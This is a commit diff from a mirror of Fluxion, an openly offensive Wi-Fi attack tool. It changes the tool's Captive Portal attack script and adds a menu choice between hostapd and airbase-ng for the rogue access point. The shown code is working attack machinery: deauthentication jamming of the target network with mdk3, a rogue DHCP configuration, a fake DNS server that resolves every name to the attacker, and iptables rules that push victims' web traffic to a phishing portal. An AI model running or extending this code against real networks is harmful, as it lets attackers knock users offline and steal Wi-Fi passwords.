Mirrors
/
fluxion
mirror of https://github.com/FluxionNetwork/fluxion.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Implemented missing AP service selection & bug fixes.

This commit is contained in:
Matias Barcenas 2018-01-18 01:17:26 -06:00
parent 32466ef94e
commit 51c35d470f
2 changed files with 101 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

128
attacks/Captive Portal/attack.sh
View File

@ -16,8 +16,8 @@ CaptivePortalAuthenticationMethodsInfo=(
# ============= < Virtual Network Configuration > ============ # # ============= < Virtual Network Configuration > ============ #
# To avoid collapsing with an already existing network, # To avoid collapsing with an already existing network,
# we'll use a somewhat uncommon network and server IP. # we'll use a somewhat uncommon network and server IP.
CaptivePortalVIGWAddress="192.168.254.1" CaptivePortalGatewayAddress="192.168.254.1"
CaptivePortalVIGWNetwork=${CaptivePortalVIGWAddress%.*} CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*}
# ============================================================ # # ============================================================ #
@ -103,6 +103,65 @@ captive_portal_set_ap_interface() {
fi fi
} }
function captive_portal_unset_ap_service() {
if [ ! "$CaptivePortalAPService" ]; then return 1; fi
CaptivePortalAPService=""
# Since we're auto-selecting when on auto, trigger undo-chain.
if [ "$FLUXIONAuto" ]; then return 2; fi
if ! interface_is_wireless "$CaptivePortalAPInterface"; then
return 3;
fi
}
function captive_portal_set_ap_service() {
if [ "$CaptivePortalAPService" ]; then return 0; fi
if ! interface_is_wireless "$CaptivePortalAPInterface"; then
return 0;
fi
captive_portal_unset_ap_service
if [ "$FLUXIONAuto" ]; then
CaptivePortalAPService="hostapd"
else
fluxion_header
echo -e "$FLUXIONVLine $CaptivePortalAPServiceQuery"
echo
fluxion_target_show
local choices=(
"$CaptivePortalAPServiceHostapdOption"
"$CaptivePortalAPServiceAirbaseOption"
"$FLUXIONGeneralBackOption"
)
io_query_choice "" choices[@]
echo
case "$IOQueryChoice" in
"$CaptivePortalAPServiceHostapdOption")
CaptivePortalAPService="hostapd" ;;
"$CaptivePortalAPServiceAirbaseOption")
CaptivePortalAPService="airbase-ng" ;;
"$FLUXIONGeneralBackOption")
return 1
;;
*)
fluxion_conditional_bail "Invalid AP service selected!"
return 1
;;
esac
fi
# AP Service: Load the service's helper routines.
source "lib/ap/$CaptivePortalAPService.sh"
}
captive_portal_unset_authenticator() { captive_portal_unset_authenticator() {
if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi
@ -144,8 +203,7 @@ captive_portal_set_authenticator() {
echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
echo echo
fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ fluxion_target_show
"$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker"
local choices=( local choices=(
"${CaptivePortalAuthenticationMethods[@]}" "${CaptivePortalAuthenticationMethods[@]}"
@ -450,8 +508,8 @@ captive_portal_unset_attack() {
sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal"
# Only reset the AP if one has been defined. # Only reset the AP if one has been defined.
if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then if [ "$CaptivePortalAPService" -a "$(type -t ap_service_reset)" ]; then
ap_reset ap_service_reset
fi fi
} }
@ -483,26 +541,33 @@ captive_portal_set_attack() {
# AP Service: Prepare service for an attack. # AP Service: Prepare service for an attack.
if [ "$APRogueService" ]; then if [ "$CaptivePortalAPService" ]; then
ap_prep ap_service_prep \
"$CaptivePortalAPInterface" \
"$CaptivePortalGatewayAddress" \
"$FluxionTargetSSID" \
"$FluxionTargetRogueMAC" \
"$FluxionTargetChannel"
CaptivePortalAccessInterface=$APServiceAccessInterface
fi fi
# Generate the dhcpd configuration file, which is # Generate the dhcpd configuration file, which is
# used to provide DHCP service to APRogue clients. # used to provide DHCP service to rogue AP clients.
echo "\ echo "\
authoritative; authoritative;
default-lease-time 600; default-lease-time 600;
max-lease-time 7200; max-lease-time 7200;
subnet $CaptivePortalVIGWNetwork.0 netmask 255.255.255.0 { subnet $CaptivePortalGatewayNetwork.0 netmask 255.255.255.0 {
option broadcast-address $CaptivePortalVIGWNetwork.255; option broadcast-address $CaptivePortalGatewayNetwork.255;
option routers $CaptivePortalVIGWAddress; option routers $CaptivePortalGatewayAddress;
option subnet-mask 255.255.255.0; option subnet-mask 255.255.255.0;
option domain-name-servers $CaptivePortalVIGWAddress; option domain-name-servers $CaptivePortalGatewayAddress;
range $CaptivePortalVIGWNetwork.100 $CaptivePortalVIGWNetwork.254; range $CaptivePortalGatewayNetwork.100 $CaptivePortalGatewayNetwork.254;
}\ }\
" >"$FLUXIONWorkspacePath/dhcpd.conf" " >"$FLUXIONWorkspacePath/dhcpd.conf"
@ -528,7 +593,7 @@ fastcgi.server = (
\".php\" => ( \".php\" => (
( (
\"bin-path\" => \"/usr/bin/php-cgi\", \"bin-path\" => \"/usr/bin/php-cgi\",
\"socket\" => \"/php.socket\" \"socket\" => \"/tmp/fluxspace/php.socket\"
) )
) )
) )
@ -632,7 +697,7 @@ class DNSQuery:
return packet return packet
if __name__ == '__main__': if __name__ == '__main__':
ip='$CaptivePortalVIGWAddress' ip='$CaptivePortalGatewayAddress'
print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@ -757,7 +822,7 @@ while [ \$AuthenticatorState = \"running\" ]; do
local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g")
echo " echo "
DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalVIGWNetwork.100-110 2>&1 | grep Host)) DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalGatewayNetwork.100-110 2>&1 | grep Host))
echo echo
echo -e \" ACCESS POINT:\" echo -e \" ACCESS POINT:\"
@ -981,7 +1046,7 @@ captive_portal_unset_routes() {
sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward" sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward"
fi fi
ip addr del $CaptivePortalVIGWAddress/24 dev $VIGW 2>/dev/null ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null
} }
# Set up DHCP / WEB server # Set up DHCP / WEB server
@ -989,7 +1054,7 @@ captive_portal_unset_routes() {
captive_portal_set_routes() { captive_portal_set_routes() {
# Give an address to the gateway interface in the rogue network. # Give an address to the gateway interface in the rogue network.
# This makes the interface accessible from the rogue network. # This makes the interface accessible from the rogue network.
ip addr add $CaptivePortalVIGWAddress/24 dev $VIGW ip addr add $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface
# Save the system's routing state to restore later. # Save the system's routing state to restore later.
cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward" cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward"
@ -1006,9 +1071,9 @@ captive_portal_set_routes() {
iptables -P FORWARD ACCEPT iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \
--to-destination $CaptivePortalVIGWAddress:80 --to-destination $CaptivePortalGatewayAddress:80
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \
--to-destination $CaptivePortalVIGWAddress:443 --to-destination $CaptivePortalGatewayAddress:443
iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A INPUT -p tcp --sport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE iptables -t nat -A POSTROUTING -j MASQUERADE
@ -1017,27 +1082,27 @@ captive_portal_set_routes() {
captive_portal_stop_interface() { captive_portal_stop_interface() {
captive_portal_unset_routes captive_portal_unset_routes
if [ "$APRogueService" ]; then if [ "$CaptivePortalAPService" ]; then
ap_stop ap_service_stop
fi fi
} }
captive_portal_start_interface() { captive_portal_start_interface() {
if [ "$APRogueService" ]; then if [ "$CaptivePortalAPService" ]; then
echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice" echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice"
ap_start ap_service_start
else else
fluxion_header fluxion_header
echo -e "$FLUXIONVLine Configuration for external access point device:" echo -e "$FLUXIONVLine Configuration for external access point device:"
echo echo
fluxion_target_show "$APRogueSSID" "OPEN" "$FluxionTargetChannel" "$APRogueMAC" "$FluxionTargetMaker" fluxion_target_show
echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalVIGWAddress%.*}.2/24" echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalGatewayAddress%.*}.2/24"
echo -e "$FLUXIONVLine IPv6 Address: Disabled" echo -e "$FLUXIONVLine IPv6 Address: Disabled"
echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalVIGWAddress" echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalGatewayAddress"
echo -e "$FLUXIONVLine DNS Server: $CaptivePortalVIGWAddress" echo -e "$FLUXIONVLine DNS Server: $CaptivePortalGatewayAddress"
echo echo
echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}" echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}"
@ -1124,6 +1189,7 @@ prep_attack() {
local sequence=( local sequence=(
"set_jammer_interface" "set_jammer_interface"
"set_ap_interface" "set_ap_interface"
"set_ap_service"
"set_authenticator" "set_authenticator"
"set_certificate" "set_certificate"
"set_connectivity" "set_connectivity"
@ -1196,7 +1262,7 @@ start_attack() {
echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice" echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice"
xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \ xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \
-title "FLUXION AP DHCP Service" -e \ -title "FLUXION AP DHCP Service" -e \
"dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" &
# Save parent's pid, to get to child later. # Save parent's pid, to get to child later.
CaptivePortalDHCPServiceXtermPID=$! CaptivePortalDHCPServiceXtermPID=$!
@ -1221,7 +1287,7 @@ start_attack() {
echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst"
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \
-title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \
"mdk3 $WIMonitor d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" &
# Save parent's pid, to get to child later. # Save parent's pid, to get to child later.
CaptivePortalJammerServiceXtermPID=$! CaptivePortalJammerServiceXtermPID=$!

4
attacks/Captive Portal/language/en.sh
View File

@ -4,6 +4,10 @@
CaptivePortalJammerInterfaceQuery="Select an interface for jamming." CaptivePortalJammerInterfaceQuery="Select an interface for jamming."
CaptivePortalAPInterfaceQuery="Select an interface for the access point." CaptivePortalAPInterfaceQuery="Select an interface for the access point."
CaptivePortalAPServiceQuery="Select an access point service"
CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)"
CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)"
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
CaptivePortalInterfaceQuery="Select an interface for the captive portal." CaptivePortalInterfaceQuery="Select an interface for the captive portal."
CaptivePortalStartingInterfaceNotice="Starting captive portal interface..." CaptivePortalStartingInterfaceNotice="Starting captive portal interface..."